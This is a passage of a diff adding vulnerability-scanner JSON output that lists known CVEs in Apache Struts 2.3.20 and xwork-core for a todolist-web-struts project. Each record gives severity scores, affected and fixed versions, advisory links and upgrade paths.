"severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.31)", + "[6.1.2,6.1.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.31", + "6.1.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-063", + "title": "Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:22.161472Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type field.\r\n\r\n## Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n", + "epssDetails": { + "percentile": "0.86905", + "probability": "0.01484", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-34149" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-06-14T10:02:40.213361Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-06-14T09:51:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-06-14T10:55:13.206157Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:27.696682Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608097", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "credit": [ + "Matthias Kaiser" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://www.exploit-db.com/exploits/49068", + "title": "Exploit" + }, + { + "url": "https://github.com/PrinceFPF/CVE-2019-0230", + "title": "Proof Of Concept" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-059", + "title": "Security Bulletin" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:34.752855Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Exploit](https://www.exploit-db.com/exploits/49068)\n- [Proof Of Concept](https://github.com/PrinceFPF/CVE-2019-0230)\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-059)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml)\n", + "epssDetails": { + "percentile": "0.99361", + "probability": "0.95346", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0230" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:31:35.397242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:14:01Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:06:54Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.021057Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "credit": [ + "Takeshi Terada of Mitsui Bussan Secure Directions", + "Inc" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-060", + "title": "Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.403682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n", + "epssDetails": { + "percentile": "0.95581", + "probability": "0.13147", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0233" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:39:32.053413Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:36:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:36:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:03.532706Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "title": "Unrestricted Upload of File with Dangerous Type", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/WW-5055", + "title": "Bug Report" + }, + { + "url": "https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:42.248460Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n## References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n", + "epssDetails": { + "percentile": "0.60025", + "probability": "0.00216", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2012-1592" + ], + "CWE": [ + "CWE-434" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-09-04T15:56:51.451242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-12-05T15:43:54Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-09-04T15:56:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:53.807283Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "title": "Denial of Service", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[,2.5.32)", + "[6.0.0,6.1.2.2)", + "[6.2.0,6.3.0.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.32", + "6.1.2.2", + "6.3.0.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-065", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:27.113057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n", + "epssDetails": { + "percentile": "0.66400", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-41835" + ], + "CWE": [ + "CWE-400" + ], + "GHSA": [ + "GHSA-729q-fcgp-r5xh" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-06T07:04:16.630936Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-05T09:33:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-06T08:01:07.098280Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:10.404666Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6102825", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Steven Seeley" + ], + "semver": { + "vulnerable": [ + "[,2.5.33)", + "[6.0.0,6.3.0.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.33", + "6.3.0.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj", + "title": "Apache Mailing List" + }, + { + "url": "https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts", + "title": "Exploitation Attempts" + }, + { + "url": "https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-066", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-07-23T07:46:17.121104Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of file upload parameters that enable path traversal. Under certain conditions, uploading of a malicious file is possible, which may then be executed on the server.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.33, 6.3.0.2 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj)\n- [Exploitation Attempts](https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts)\n- [GitHub Commit](https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163)\n- [GitHub Commit](https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6)\n- [PoC](https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-066)\n", + "epssDetails": { + "percentile": "0.94639", + "probability": "0.09044", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-50164" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-07T11:44:29.902168Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-07T09:45:05Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-07T12:27:32.361011Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-23T07:46:17.121104Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "title": "Parameter Alteration", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "rskvp93" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-026.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:10.273105Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-235" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.673000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-09-28T16:59:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-09-28T16:59:30Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + 